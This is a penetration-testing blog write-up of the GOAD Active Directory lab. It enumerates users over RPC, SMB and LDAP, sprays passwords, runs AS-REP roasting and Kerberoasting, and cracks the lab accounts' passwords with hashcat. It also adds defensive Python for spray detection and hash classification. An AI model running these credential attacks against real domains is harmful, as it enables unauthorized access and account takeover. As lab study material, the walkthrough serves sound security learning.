
GOAD User Enumeration

In the previous post, GOAD Reconnaissance and Enumeration, we scanned the hosts on the GOAD network and port-scanned each host.

This post focuses on enumerating users that can be used for the intrusion, based on the services exposed on the hosts of each domain.

I tried to extract users through service enumeration against every host in the sevenkingdoms.local and essos.local domains as well, but only the hosts in the north.sevenkingdoms.local domain yielded meaningful information, so the records for the remaining hosts are omitted.

north.sevenkingdoms.local

The DC of the north.sevenkingdoms.local domain is winterfell.north.sevenkingdoms.local, and castelblack.north.sevenkingdoms.local is a domain member.

winterfell.north.sevenkingdoms.local (192.168.56.11)

DNS

For the north.sevenkingdoms.local domain too, the ANY query with the dig command turned up no additional hosts.

┌──(root㉿kali)-[~]
└─# dig any north.sevenkingdoms.local @192.168.56.11

; <<>> DiG 9.18.16-1-Debian <<>> any north.sevenkingdoms.local @192.168.56.11
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6718
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;north.sevenkingdoms.local.	IN	ANY

;; ANSWER SECTION:
north.sevenkingdoms.local. 600	IN	A	192.168.56.11
north.sevenkingdoms.local. 3600	IN	NS	winterfell.north.sevenkingdoms.local.
north.sevenkingdoms.local. 3600	IN	SOA	winterfell.north.sevenkingdoms.local. hostmaster.north.sevenkingdoms.local. 35 900 600 86400 3600

;; ADDITIONAL SECTION:
winterfell.north.sevenkingdoms.local. 3600 IN A	192.168.56.11

;; Query time: 0 msec
;; SERVER: 192.168.56.11#53(192.168.56.11) (TCP)
;; WHEN: Fri Dec 29 03:03:15 EST 2023
;; MSG SIZE  rcvd: 158

RPC

Anonymous access to the RPC service on winterfell.north.sevenkingdoms.local allowed user enumeration as shown below, and the Description of the samwell.tarly account contained its password.

┌──(root㉿kali)-[~]
└─# rpcclient -U '' -N 192.168.56.11
rpcclient $> querydispinfo
index: 0x18dd RID: 0x455 acb: 0x00000210 Account: arya.stark	Name: (null)	Desc: Arya Stark
index: 0x18e3 RID: 0x45b acb: 0x00010210 Account: brandon.stark	Name: (null)	Desc: Brandon Stark
index: 0x172e RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x18e5 RID: 0x45d acb: 0x00000210 Account: hodor	Name: (null)	Desc: Brainless Giant
index: 0x18e8 RID: 0x460 acb: 0x00000210 Account: jeor.mormont	Name: (null)	Desc: Jeor Mormont
index: 0x18e6 RID: 0x45e acb: 0x00040210 Account: jon.snow	Name: (null)	Desc: Jon Snow
index: 0x18e4 RID: 0x45c acb: 0x00000210 Account: rickon.stark	Name: (null)	Desc: Rickon Stark
index: 0x18e7 RID: 0x45f acb: 0x00000210 Account: samwell.tarly	Name: (null)	Desc: Samwell Tarly (Password : Heartsbane)
index: 0x18e2 RID: 0x45a acb: 0x00000210 Account: sansa.stark	Name: (null)	Desc: Sansa Stark
index: 0x18e9 RID: 0x461 acb: 0x00000210 Account: sql_svc	Name: (null)	Desc: sql service

SMB

On the SMB service, no shares could be enumerated anonymously.

┌──(root㉿kali)-[~]
└─# netexec smb '192.168.56.11' --shares
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] Error getting user: list index out of range
SMB         192.168.56.11   445    WINTERFELL       [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

┌──(root㉿kali)-[~]
└─# netexec smb '192.168.56.11' -u '' -p '' --shares
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\:
SMB         192.168.56.11   445    WINTERFELL       [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(root㉿kali)-[~]
└─# netexec smb '192.168.56.11' -u 'juicemon' -p '' --shares
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\juicemon: STATUS_LOGON_FAILURE

However, as with rpcclient, users can also be enumerated through netexec, as shown below.

┌──(root㉿kali)-[~/Desktop/Test]
└─# netexec smb '192.168.56.11' --users
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [*] Trying to dump local users with SAMRPC protocol
SMB         192.168.56.11   445    WINTERFELL       [+] Enumerated domain user(s)
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\Guest                          Built-in account for guest access to the computer/domain
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\arya.stark                     Arya Stark
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\sansa.stark                    Sansa Stark
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\brandon.stark                  Brandon Stark
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\rickon.stark                   Rickon Stark
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\hodor                          Brainless Giant
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\jon.snow                       Jon Snow
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\samwell.tarly                  Samwell Tarly (Password : Heartsbane)
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\jeor.mormont                   Jeor Mormont
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\sql_svc                        sql service

To check whether the samwell.tarly account, whose password was so helpfully written in its description, is actually usable, I authenticated to SMB with it as shown below and enumerated the shares, which succeeded.

Among them, IPC$, NETLOGON and SYSVOL were readable, but none of them contained anything interesting.

┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# netexec smb '192.168.56.11' -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB         192.168.56.11   445    WINTERFELL       [*] Enumerated shares
SMB         192.168.56.11   445    WINTERFELL       Share           Permissions     Remark
SMB         192.168.56.11   445    WINTERFELL       -----           -----------     ------
SMB         192.168.56.11   445    WINTERFELL       ADMIN$                          Remote Admin
SMB         192.168.56.11   445    WINTERFELL       C$                              Default share
SMB         192.168.56.11   445    WINTERFELL       IPC$            READ            Remote IPC
SMB         192.168.56.11   445    WINTERFELL       NETLOGON        READ            Logon server share
SMB         192.168.56.11   445    WINTERFELL       SYSVOL          READ            Logon server share

Password Spray

To run a password spray looking for users whose password equals their username, I built a list of all users from the values returned by rpcclient, as shown below.

┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# cat rpcclient.out | awk '{ print $8 }' > blind-users.txt


┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# cat blind-users.txt
arya.stark
brandon.stark
Guest
hodor
jeor.mormont
jon.snow
rickon.stark
samwell.tarly
sansa.stark
sql_svc

Spraying SMB with this list, as shown below, confirmed that the hodor account's password is the same as its username.

┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# netexec smb '192.168.56.11' -u blind-users.txt -p blind-users.txt --no-brute --continue-on-success
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\arya.stark:arya.stark STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\brandon.stark:brandon.stark STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\Guest:Guest STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\hodor:hodor
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\rickon.stark:rickon.stark STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sansa.stark:sansa.stark STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE

Because a password spray can lock accounts out under the password policy, it is recommended to check the policy first with netexec smb 'IP Address' --pass-pol before proceeding.
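On the defender's side, the spray above leaves a very recognisable trace: one source address failing logons against many distinct accounts within seconds, with the occasional success in between. The following is an added example (not from the original post) that runs that detection over constructed logon events; it assumes a simplified one-line-per-event format of timestamp, event ID (4625 failed / 4624 successful logon), target user and source IP rather than full Windows event XML.

```python
"""Detect password spraying from Windows logon audit events (added example).

Assumed input format (constructed, not a real EVTX export), one event per line:
    <ISO timestamp> <EventID> <TargetUserName> <IpAddress>
where 4625 is a failed logon and 4624 a successful one.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source spraying "username as password" against the
# north.sevenkingdoms.local user list (one hit: hodor), plus an unrelated user
# who mistyped a password twice and then logged on normally.
SAMPLE_EVENTS = """\
2024-01-09T22:10:00 4625 arya.stark 192.168.56.100
2024-01-09T22:10:00 4625 brandon.stark 192.168.56.100
2024-01-09T22:10:01 4625 Guest 192.168.56.100
2024-01-09T22:10:01 4624 hodor 192.168.56.100
2024-01-09T22:10:01 4625 jeor.mormont 192.168.56.100
2024-01-09T22:10:02 4625 jon.snow 192.168.56.100
2024-01-09T22:10:02 4625 rickon.stark 192.168.56.100
2024-01-09T22:10:02 4625 samwell.tarly 192.168.56.100
2024-01-09T22:10:03 4625 sansa.stark 192.168.56.100
2024-01-09T22:10:03 4625 sql_svc 192.168.56.100
2024-01-09T22:15:40 4625 sansa.stark 192.168.56.22
2024-01-09T22:15:55 4625 sansa.stark 192.168.56.22
2024-01-09T22:16:10 4624 sansa.stark 192.168.56.22
"""


def parse_events(text):
    """Parse the constructed format into (timestamp, event_id, user, source) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, src = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), user.lower(), src))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: sorted list of sprayed accounts} for every source that
    failed logons against at least `min_users` distinct accounts inside `window`.

    A sliding window over each source's failures is used, so a burst is caught
    even when a success (4624) lands in the middle of it. Ordinary users who
    mistype their own password fail against one account only and are not flagged.
    """
    failures = defaultdict(list)
    for ts, event_id, user, src in sorted(events):
        if event_id == 4625:
            failures[src].append((ts, user))

    alerts = {}
    for src, fails in failures.items():
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if len({u for _, u in fails[start:end + 1]}) >= min_users:
                # Report every account this source touched, not just the window.
                alerts[src] = sorted({u for _, u in fails})
                break
    return alerts


def spray_successes(events, alerts):
    """Accounts that logged on successfully from a flagged source: these are the
    credentials the spray actually found and the first ones to reset."""
    hits = defaultdict(list)
    for _, event_id, user, src in events:
        if event_id == 4624 and src in alerts:
            hits[src].append(user)
    return dict(hits)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    flagged = detect_spray(evs)
    for src, users in flagged.items():
        print(f"[!] possible password spray from {src}: {len(users)} accounts -> {users}")
    for src, users in spray_successes(evs, flagged).items():
        print(f"[!] successful logons during the spray from {src}: {users}")
```

The `min_users` threshold should sit below the domain's lockout threshold from `--pass-pol`, since an attacker aware of the policy will spray fewer attempts per account than that.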

AS-REP Roasting

Next, I looked for accounts in north.sevenkingdoms.local that have pre-authentication disabled and performed AS-REP Roasting. Using impacket-GetNPUsers for the attack, I obtained a ticket for the brandon.stark account as shown below.

┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# impacket-GetNPUsers 'north.sevenkingdoms.local/' -usersfile valid-users.txt  -dc-ip '192.168.56.11' -outputfile asreproasting.out
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:33f5c8d1f475188fd46bc5fd04e6e821$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
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set

Cracking this ticket with hashcat succeeded, yielding the password of the brandon.stark account as well.

┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# hashcat -m 18200 -a 0 asreproasting.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i9-12900KF, 2914/5892 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:33f5c8d1f475188fd46bc5fd04e6e821$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:iseedeadpeople

So far, enumerating services and users on winterfell.north.sevenkingdoms.local has yielded a total of three accounts:

  • north.sevenkingdoms.local\samwell.tarly:Heartsbane (User Description)
  • north.sevenkingdoms.local\hodor:hodor (Password Spray)
  • north.sevenkingdoms.local\brandon.stark:iseedeadpeople (AS-REP Roasting)

LDAP

Three valid accounts were obtained above through various methods. Using those accounts, bind to LDAP and build the user lists.

sevenkingdoms.local

┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec ldap '192.168.56.10' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --users
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP        192.168.56.10   389    KINGSLANDING     [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP        192.168.56.10   389    KINGSLANDING     [*] Total of records returned 19
LDAP        192.168.56.10   389    KINGSLANDING     Administrator                  Built-in account for administering the computer/domain
LDAP        192.168.56.10   389    KINGSLANDING     Guest                          Built-in account for guest access to the computer/domain
LDAP        192.168.56.10   389    KINGSLANDING     vagrant                        Vagrant User
LDAP        192.168.56.10   389    KINGSLANDING     krbtgt                         Key Distribution Center Service Account
LDAP        192.168.56.10   389    KINGSLANDING     tywin.lannister                Tywin Lanister
LDAP        192.168.56.10   389    KINGSLANDING     jaime.lannister                Jaime Lanister
LDAP        192.168.56.10   389    KINGSLANDING     cersei.lannister               Cersei Lanister
LDAP        192.168.56.10   389    KINGSLANDING     tyron.lannister                Tyron Lanister
LDAP        192.168.56.10   389    KINGSLANDING     robert.baratheon               Robert Lanister
LDAP        192.168.56.10   389    KINGSLANDING     joffrey.baratheon              Joffrey Baratheon
LDAP        192.168.56.10   389    KINGSLANDING     renly.baratheon                Renly Baratheon
LDAP        192.168.56.10   389    KINGSLANDING     stannis.baratheon              Stannis Baratheon
LDAP        192.168.56.10   389    KINGSLANDING     petyer.baelish                 Petyer Baelish
LDAP        192.168.56.10   389    KINGSLANDING     lord.varys                     Lord Varys
LDAP        192.168.56.10   389    KINGSLANDING     maester.pycelle                Maester Pycelle

north.sevenkingdoms.local

This list was already obtained through user enumeration over RPC and SMB, but I record it once more :)

┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec ldap '192.168.56.11' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --users
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP        192.168.56.11   389    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP        192.168.56.11   389    WINTERFELL       [*] Total of records returned 17
LDAP        192.168.56.11   389    WINTERFELL       Administrator                  Built-in account for administering the computer/domain
LDAP        192.168.56.11   389    WINTERFELL       Guest                          Built-in account for guest access to the computer/domain
LDAP        192.168.56.11   389    WINTERFELL       vagrant                        Vagrant User
LDAP        192.168.56.11   389    WINTERFELL       krbtgt                         Key Distribution Center Service Account
LDAP        192.168.56.11   389    WINTERFELL       arya.stark                     Arya Stark
LDAP        192.168.56.11   389    WINTERFELL       eddard.stark                   Eddard Stark
LDAP        192.168.56.11   389    WINTERFELL       catelyn.stark                  Catelyn Stark
LDAP        192.168.56.11   389    WINTERFELL       robb.stark                     Robb Stark
LDAP        192.168.56.11   389    WINTERFELL       sansa.stark                    Sansa Stark
LDAP        192.168.56.11   389    WINTERFELL       brandon.stark                  Brandon Stark
LDAP        192.168.56.11   389    WINTERFELL       rickon.stark                   Rickon Stark
LDAP        192.168.56.11   389    WINTERFELL       hodor                          Brainless Giant
LDAP        192.168.56.11   389    WINTERFELL       jon.snow                       Jon Snow
LDAP        192.168.56.11   389    WINTERFELL       samwell.tarly                  Samwell Tarly (Password : Heartsbane)
LDAP        192.168.56.11   389    WINTERFELL       jeor.mormont                   Jeor Mormont
LDAP        192.168.56.11   389    WINTERFELL       sql_svc                        sql service

essos.local

┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec ldap '192.168.56.12' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --users
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
LDAP        192.168.56.12   389    MEEREEN          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP        192.168.56.12   389    MEEREEN          [*] Total of records returned 13
LDAP        192.168.56.12   389    MEEREEN          Administrator                  Built-in account for administering the computer/domain
LDAP        192.168.56.12   389    MEEREEN          Guest                          Built-in account for guest access to the computer/domain
LDAP        192.168.56.12   389    MEEREEN          DefaultAccount                 A user account managed by the system.
LDAP        192.168.56.12   389    MEEREEN          vagrant                        Vagrant User
LDAP        192.168.56.12   389    MEEREEN          krbtgt                         Key Distribution Center Service Account
LDAP        192.168.56.12   389    MEEREEN          daenerys.targaryen             Darnerys Targaryen
LDAP        192.168.56.12   389    MEEREEN          viserys.targaryen              Viserys Targaryen
LDAP        192.168.56.12   389    MEEREEN          khal.drogo                     Khal Drogo
LDAP        192.168.56.12   389    MEEREEN          jorah.mormont                  Jorah Mormont
LDAP        192.168.56.12   389    MEEREEN          sql_svc                        sql service

After building the user list for each domain, I ran another password spray through netexec (password equal to the account name, and the passwords of the accounts obtained so far), but no new accounts were found.

Kerberoasting

In an Active Directory environment there are users with an SPN set. An SPN (Service Principal Name) is the unique identifier of a service instance; Kerberos authentication uses it to associate a service instance with a service logon account.

This means any valid domain account can request a service ticket (ST) for a domain service. The ticket can then be cracked with a hash-cracking tool such as Hashcat or John the Ripper!

impacket-GetUserSPNs can be used to look up users' SPNs and request the tickets.

┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# impacket-GetUserSPNs 'north.sevenkingdoms.local/samwell.tarly:Heartsbane' -dc-ip '192.168.56.11' -request -outputfile kerberoasting-north.sevenkingdoms.local.out
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

ServicePrincipalName                                 Name      MemberOf                                                    PasswordLastSet             LastLogon                   Delegation
---------------------------------------------------  --------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
CIFS/winterfell.north.sevenkingdoms.local            jon.snow  CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2023-12-28 03:41:00.459219  2024-01-02 01:42:17.382072  constrained
HTTP/thewall.north.sevenkingdoms.local               jon.snow  CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2023-12-28 03:41:00.459219  2024-01-02 01:42:17.382072  constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                               2023-12-28 03:41:05.546731  2024-01-09 18:47:23.916579
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                               2023-12-28 03:41:05.546731  2024-01-09 18:47:23.916579
┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# cat kerberoasting-north.sevenkingdoms.local.out
$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$a0fbad750dd4f43e2f8bc66d519bf0ac$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
$krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$4d0e7a39e0ec2ae7056f089d2848bd33$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

As in AS-REP Roasting, the tickets are cracked with hashcat. The value passed with the -m option is the hash type, which can be looked up under Generic hash types.

Cracking the issued tickets, the jon.snow hash was cracked out of the two tickets, which gave me a fourth account.

  • north.sevenkingdoms.local\samwell.tarly:Heartsbane (User Description)
  • north.sevenkingdoms.local\hodor:hodor (Password Spray)
  • north.sevenkingdoms.local\brandon.stark:iseedeadpeople (AS-REP Roasting)
  • north.sevenkingdoms.local\jon.snow:iknownothing (Kerberoasting)
┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# hashcat -m 13100 -a 0 kerberoasting-north.sevenkingdoms.local.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i9-12900KF, 2914/5892 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$a0fbad750dd4f43e2f8bc66d519bf0ac$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:iknownothing
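The -m value follows directly from the hash prefix: $krb5asrep$23$ and $krb5tgs$23$ both say etype 23, i.e. RC4-HMAC, which is the fast-to-crack case, and the $23$ is also what a defender should read from such output, because it means the account (or the domain) still issues RC4 tickets. The following is an added example (not from the original post) that parses the three hash formats seen in this post, picks the hashcat mode, and lists the RC4-issued accounts; the sample lines reuse the post's usernames and checksums with constructed placeholder data, and the etype 18 line is constructed to exercise the AES branch (the post's sql_svc ticket was etype 23).

```python
"""Classify captured Kerberos / NetNTLMv2 hash lines and pick the hashcat mode (added example).

Formats handled:
  $krb5asrep$<etype>$user@REALM:checksum$edata            (impacket GetNPUsers)
  $krb5tgs$23$*user$REALM$spn*$checksum$edata             (impacket GetUserSPNs, RC4)
  $krb5tgs$17|18$user$REALM$*spn*$checksum$edata          (impacket GetUserSPNs, AES)
  user::DOMAIN:serverchallenge:ntproofstr:blob             (Responder NetNTLMv2)
"""
import re

# hashcat mode numbers for the formats above; anything else is reported as unsupported.
HASHCAT_MODES = {
    ("krb5asrep", 23): 18200,  # Kerberos 5, etype 23, AS-REP
    ("krb5tgs", 23): 13100,    # Kerberos 5, etype 23, TGS-REP
    ("krb5tgs", 17): 19600,    # Kerberos 5, etype 17 (AES128-CTS-HMAC-SHA1-96), TGS-REP
    ("krb5tgs", 18): 19700,    # Kerberos 5, etype 18 (AES256-CTS-HMAC-SHA1-96), TGS-REP
    ("netntlmv2", None): 5600, # NetNTLMv2
}

ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$")
TGS23_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$")
TGSAES_RE = re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$")
NTLMV2_RE = re.compile(r"^([^:]+)::([^:]+):([0-9a-fA-F]{16}):([0-9a-fA-F]{32}):([0-9a-fA-F]+)$")

# Constructed sample (edata/blob fields are placeholders, not real ticket material).
SAMPLE = """\
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:33f5c8d1f475188fd46bc5fd04e6e821$0011223344556677
$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$a0fbad750dd4f43e2f8bc66d519bf0ac$0011223344556677
$krb5tgs$18$sql_svc$NORTH.SEVENKINGDOMS.LOCAL$*MSSQLSvc/castelblack.north.sevenkingdoms.local:1433*$00112233445566778899aabb$0011223344556677
robb.stark::NORTH:a7dfb147661e0038:d14dcafa720a1538e2c79c6908c788ad:0101000000000000
not a hash line
"""


def identify(line):
    """Describe one hash line: kind, etype, user, realm, spn and hashcat mode (None if unknown)."""
    line = line.strip()
    m = ASREP_RE.match(line)
    if m:
        etype = int(m.group(1))
        return {"kind": "AS-REP", "etype": etype, "user": m.group(2), "realm": m.group(3),
                "spn": None, "mode": HASHCAT_MODES.get(("krb5asrep", etype))}
    m = TGS23_RE.match(line)
    if m:
        return {"kind": "TGS-REP", "etype": 23, "user": m.group(1), "realm": m.group(2),
                "spn": m.group(3), "mode": HASHCAT_MODES[("krb5tgs", 23)]}
    m = TGSAES_RE.match(line)
    if m:
        etype = int(m.group(1))
        return {"kind": "TGS-REP", "etype": etype, "user": m.group(2), "realm": m.group(3),
                "spn": m.group(4), "mode": HASHCAT_MODES[("krb5tgs", etype)]}
    m = NTLMV2_RE.match(line)
    if m:
        return {"kind": "NetNTLMv2", "etype": None, "user": m.group(1), "realm": m.group(2),
                "spn": None, "mode": HASHCAT_MODES[("netntlmv2", None)]}
    return None


def group_by_mode(lines):
    """Split lines into one list per hashcat mode (hashcat takes one -m per run),
    returning (groups, unrecognised_lines)."""
    groups, unknown = {}, []
    for line in lines:
        info = identify(line)
        if info is None or info["mode"] is None:
            unknown.append(line.strip())
            continue
        groups.setdefault(info["mode"], []).append(info)
    return groups, unknown


def rc4_accounts(groups):
    """Accounts whose ticket was issued with RC4 (etype 23). For a defender these are
    the accounts, or the domain policy, to move to AES-only encryption types."""
    return sorted({i["user"] for infos in groups.values() for i in infos if i["etype"] == 23})


if __name__ == "__main__":
    groups, unknown = group_by_mode(SAMPLE.splitlines())
    for mode, infos in sorted(groups.items()):
        print(f"hashcat -m {mode}: {[i['user'] for i in infos]}")
    print("RC4-issued tickets:", rc4_accounts(groups))
    print("unrecognised:", unknown)
```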

Kerberoasting with impacket's GetUserSPNs can also be done with the netexec ldap '192.168.56.12' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --kerberoasting command, which gives the same result.

